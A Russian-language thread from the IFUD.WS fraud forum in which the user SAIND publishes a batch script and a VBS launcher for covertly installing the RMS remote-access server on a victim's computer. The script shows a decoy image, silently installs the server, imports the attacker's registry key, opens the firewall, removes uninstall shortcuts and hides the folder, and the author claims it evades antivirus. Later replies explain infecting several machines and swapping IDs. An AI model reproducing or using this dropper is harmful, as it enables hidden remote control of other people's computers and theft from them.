1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Новый способ установки РМСины .

Тема в разделе "Наши статьи", создана пользователем SAIND, 26 дек 2012.

1. TopicStarter Overlay
    SAIND

SAIND

Симпатии:
    606
    Привет всем с вами И СЕЙЧАС Я ВАМ ПОКАЖУ НОВЫЙ СПОСОБ УСТАНОВКИ СЕРВЕРА RMS ,Т.К СТАРЫЙ И ВСЕМ ИЗВЕСТНЫЙ СПОСОБ Не ПРОПУСКАЮТ АНТИВИРУСЫ И ВОТ Я ПРИДУМАЛ КАК ЭТО ОБОЙТИ СНАЧАЛА Я ВАМ ПОКАЖУ КАК РУГАЕТСЯ АНТИВИРУС НА СТАРЫЙ СПОСОБ А ПОТОМ КАК РАБОТАЕТ НОВЫЙ .Проверял не ругается Аваст 2012 не ругается касперский 2010 обновленный .Сервер устанавливается как вы бы его просто скачали и начали устанавливать себе на компьтер ток теперь не используется в качестве запуска EXE.Запускается все Bat Файлом в скрытом режиме без вывода окна консоли CMD чтобы не было подозрений на программу .В батнике я прописал чтобы папка с сервером стала скрытой и системной .В панели меню удалил удалялку чтобы было не удалить но удалить можно при помощи панели инструментов но думаю когда сервер устанавливается не чего не ругается жертва и не будет искать эту программу.
    Вот видео :
    Так а теперь теории .
    Вот батинок :
    Код:
    @echo off
    CHCP 1251
    start full.jpg /S
    ping -n 20 127.0.0.1 > NUL
    net stop RManService
    taskkill /im rutserv.exe /f
    taskkill /im rfusclient.exe /f
    taskkill /im HookDrv.dll /f
    taskkill /im rversionlib.dll /f
    start ru.msi /quiet
    ping -n 20 127.0.0.1 > NUL
    taskkill /im rutserv.exe /f
    taskkill /im rfusclient.exe /f
    taskkill /im HookDrv.dll /f
    taskkill /im rversionlib.dll /f
    reg import "%SystemRoot%\key.reg"
    reg import "key.reg"
    "C:\Program Files\Remote Manipulator System - Server\rutserv.exe" /server /firewall
    "C:\Program Files\Remote Manipulator System - Server\rutserv.exe" /server /silentinstall
    "C:\Program Files\Remote Manipulator System - Server\rutserv.exe" /server /start
    cd "c:\ProgramData\Microsoft\Windows\Start Menu\Programs\"
    del /s /q "Remote Manipulator System - Server"
    cd "C:\Documents and Settings\All Users\Главное меню\Программы\"
    del /s /q "Remote Manipulator System - Server"
    attrib +a +s +r +h "C:\Program Files\Remote Manipulator System - Server"
    exit
    Так разберем его :
    @echo off -скрываем все
    CHCP 1251 -русская раскладка для ХР
    start full.jpg /S -стартует пруга или фотка для отвода глаз (full.jpg) поменять на свой файл
    ping -n 20 127.0.0.1 > NUL- пауза
    net stop RManService -остоновка сервера вдруг он будет у жертвы
    taskkill /im rutserv.exe /f -убиваем процессы сервака
    taskkill /im rfusclient.exe /f -убиваем процессы сервака
    taskkill /im HookDrv.dll /f -убиваем процессы сервака
    taskkill /im rversionlib.dll /f -убиваем процессы сервака
    start ru.msi /quiet -устанавливаем сервер в тихом режиме
    ping -n 20 127.0.0.1 > NUL -Пауза
    taskkill /im rutserv.exe /f --убиваем процессы сервака
    taskkill /im rfusclient.exe /f -убиваем процессы сервака
    taskkill /im HookDrv.dll /f -убиваем процессы сервака
    taskkill /im rversionlib.dll /f -убиваем процессы сервака
    reg import "%SystemRoot%\key.reg" -Экспортируем ключь в реестр
    reg import "key.reg" -Экспортируем ключь в реестр
    "C:\Program Files\Remote Manipulator System - Server\rutserv.exe" /server /firewall
    "C:\Program Files\Remote Manipulator System - Server\rutserv.exe" /server /silentinstall
    "C:\Program Files\Remote Manipulator System - Server\rutserv.exe" /server /start
    cd "c:\ProgramData\Microsoft\Windows\Start Menu\Programs\" -Идем в папку Programs
    del /s /q "Remote Manipulator System - Server" -Удоляем папку Remote Manipulator System - Server
    cd "C:\Documents and Settings\All Users\Главное меню\Программы\"-идем в папку Программы
    del /s /q "Remote Manipulator System - Server"-Удоляем папку Remote Manipulator System - Server
    attrib +a +s +r +h "C:\Program Files\Remote Manipulator System - Server" -делаем невидимой папку Remote Manipulator System - Server
    exit -Все выходим сервак установлен

Так теперь скрипт чтобы не вылетала консоль CMD:
    Код:
    Dim oShell
    Set oShell = WScript.CreateObject ("WSCript.shell")
    oShell.run "start.bat", 0
    Set oShell = Nothing

Разберем его :
    Dim oShell
    Set oShell = WScript.CreateObject ("WSCript.shell")
    oShell.run "start.bat", 0 -За место start.bat Ваше имя ботика у меня start.bat
    Set oShell = Nothing

Потом делаем ярлык и ставим на него иконку лудше с системы с адреса %SystemRoot%\system32\SHELL32.dll тогда точно будет иконка.
    Для тестирования можете скачать тест который я делал в видео Please login or register to view links
    Сам клиент можно скачать Please login or register to view links
    P.S Расписывать на пол стронции не стал Please login or register to view links

• Like Like x 9
    Метки:
  2. Ltybcrf

Ltybcrf Гость

Витя красавчик как всегда )

3. TopicStarter Overlay
    SAIND

SAIND

Симпатии:
    606
    :!!!Этот Ебан*****ый Please login or register to view links удолили все мои файлы во всех моих темах :( Буду теперь лить на Please login or register to view links там хоть файлы хоронятся .Вскоре переваливать буду и Е******бал я Please login or register to view links Депозит уже проверен у меня временем .Файл который закачивал год назад до сихпор лежит на депозите .
    Перелазил Сейчас буду по всем темам моим ходить там тоже все по удоляли этот Please login or register to view links.

4. Serge

Serge

Симпатии:
    38
    появился вопрос, как я понимаю этот способ только для 1 компа так как ид же один или все же можно будит распространить на множество компов и для всех просто будит тупо 1 ид и все будит работать? то есть к примеру таким способом я зарозил несколько компов и они все появятся в списке для подключение и при нажатии на определенном компе тот и откроется?

5. TopicStarter Overlay
    SAIND

SAIND

Симпатии:
    606
    Да на один комп .но если им зарозить 10 копов то будет врубатся ближайший если он тебе не нужен его просто в свойствах рмс вырубаешь через диспетчер задач и потом коненктишся уже к другому и так далие то есть не надо забивать кучай Id свой рмс ,А если нужна конкретная тачка то просто поменяй ключь и конекся

6. Serge

Serge

Симпатии:
    38
    пробовал удаленно сменить ID там в настройках есть такое но не чего не вышло :(

7. TopicStarter Overlay
    SAIND

SAIND

Симпатии:
    606
    Создаёшь новый ключ реестра у себя на компе с новым id , пишешь батинок ботинок сначало должен выключить сервер а потом поменять ключь реестра а потом запустить сервер ,Дошло надеюсь до тебя .Все хорошо меняется ,еще проверь на ip может у него прямой ip то есть запускаешь толнет и пишешь ipconfig и вылитит его ip (ip будет прописан в протоколе 4 ) попробуй к нему подконекся 50% компов сидят на прямом ip а не через NAT тоесть и ключ менять не надо .

8. Serge

Serge

Симпатии:
    38
    да это уже придумал :) просто писал то я вчера :)

Поделиться этой страницей

Загрузка...